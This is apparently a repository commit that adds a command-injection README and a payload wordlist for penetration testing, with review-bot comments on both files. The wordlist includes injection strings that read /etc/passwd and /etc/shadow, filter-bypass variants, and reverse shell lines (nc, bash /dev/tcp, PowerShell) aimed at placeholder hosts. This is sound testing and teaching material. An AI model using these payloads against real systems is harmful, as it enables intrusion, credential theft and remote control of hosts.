mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 11:35:51 +00:00
Restructure repository: Remove OWASP categorization, organize by vulnerability type
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
@@ -0,0 +1,17 @@
|
||||
# Command Injection
|
||||
|
||||
## Description
|
||||
Command injection is a cyber attack that involves executing arbitrary commands on a host operating system. This vulnerability occurs when an application passes unsafe user-supplied data to a system shell.
|
||||
|
||||
## Common Attack Vectors
|
||||
- System administration interfaces
|
||||
- File upload functionality
|
||||
- Network diagnostic tools (ping, traceroute)
|
||||
- Backup/restore functions
|
||||
- Any feature that executes system commands
|
||||
|
||||
## Testing Approach
|
||||
Submit command separators and system commands in input fields to test if the application executes arbitrary commands.
|
||||
|
||||
## Payloads
|
||||
See `command-injection-payloads.txt` for a comprehensive list of command injection payloads.
|
||||
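Review bot: The "## Testing Approach" section is a single sentence and does not say how a tester confirms that a command actually ran, so results from this page will be inconsistent between testers. It should separate the case where command output is reflected in the response from the blind case where only a response delay is observable; the payload file added in this same commit has a "# Time-based detection" section that this README never mentions. The page also stops at "## Payloads" with no remediation guidance. A short section stating the fix would make findings actionable: do not pass user-supplied data to a system shell, invoke the program directly with an argument list, and validate input against an allow-list. Under "## Common Attack Vectors", "File upload functionality" needs a clause saying which part of an upload reaches a shell, since as written it reads like a different vulnerability class.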
@@ -0,0 +1,80 @@
|
||||
# Command Injection Payloads
|
||||
|
||||
# Basic command injection
|
||||
; ls
|
||||
| ls
|
||||
|| ls
|
||||
& ls
|
||||
&& ls
|
||||
`ls`
|
||||
$(ls)
|
||||
|
||||
# Chained commands
|
||||
; whoami
|
||||
| whoami
|
||||
|| whoami
|
||||
& whoami
|
||||
&& whoami
|
||||
|
||||
# Command substitution
|
||||
`whoami`
|
||||
$(whoami)
|
||||
;`whoami`
|
||||
;$(whoami)
|
||||
|
||||
# File operations
|
||||
; cat /etc/passwd
|
||||
| cat /etc/passwd
|
||||
; cat /etc/shadow
|
||||
| cat /etc/shadow
|
||||
; ls -la
|
||||
| ls -la /
|
||||
|
||||
# Windows commands
|
||||
& dir
|
||||
| dir
|
||||
& type C:\Windows\win.ini
|
||||
| type C:\boot.ini
|
||||
& whoami
|
||||
| net user
|
||||
|
||||
# Time-based detection
|
||||
; sleep 5
|
||||
| sleep 5
|
||||
& ping -n 5 127.0.0.1
|
||||
| ping -c 5 127.0.0.1
|
||||
; timeout 5
|
||||
& timeout /t 5
|
||||
|
||||
# Output redirection
|
||||
; ls > /tmp/output.txt
|
||||
| ls > /tmp/output.txt
|
||||
& dir > C:\temp\output.txt
|
||||
|
||||
# URL encoded
|
||||
%3B%20ls
|
||||
%7C%20ls
|
||||
%26%20whoami
|
||||
|
||||
# Newline injection
|
||||
%0a whoami
|
||||
%0d%0a whoami
|
||||
\n whoami
|
||||
\r\n whoami
|
||||
|
||||
# Spaces bypass
|
||||
;cat</etc/passwd
|
||||
|cat</etc/passwd
|
||||
{cat,/etc/passwd}
|
||||
cat${IFS}/etc/passwd
|
||||
cat$IFS/etc/passwd
|
||||
|
||||
# Quotes bypass
|
||||
c'a't /etc/passwd
|
||||
c"a"t /etc/passwd
|
||||
c\at /etc/passwd
|
||||
|
||||
# Reverse shell payloads (for authorized testing only - replace YOUR_IP and PORT)
|
||||
; nc -e /bin/sh YOUR_IP PORT
|
||||
| bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1
|
||||
& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);"
|
||||
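Review bot: This file mixes read-only detection probes with entries that change state on the target or open a remote session, all in one flat list, and that is a problem if it is the `command-injection-payloads.txt` the README points to as a list to work through. Anyone loading it line by line into a scanner will send the "# Output redirection" entries, which write `/tmp/output.txt` and `C:\temp\output.txt` on the host, and the "# Reverse shell payloads" entries with the literal strings `YOUR_IP` and `PORT`, alongside the harmless `; ls` and `; sleep 5` probes. The `# ...` section headers and the "# Command Injection Payloads" title would be submitted as inputs too. Suggest keeping detection-only entries (the basic, chained, substitution and time-based sections) in this file, moving anything that writes files or reads `/etc/shadow` into a separate file that is clearly marked as state-changing, and dropping the reverse shell section from a wordlist entirely. Its PowerShell line only constructs a `TCPClient` and does nothing further, so it is not usable as written, and the "authorized testing only" caveat in a comment does not survive being parsed as a payload. `& whoami` also appears twice, under "# Chained commands" and "# Windows commands".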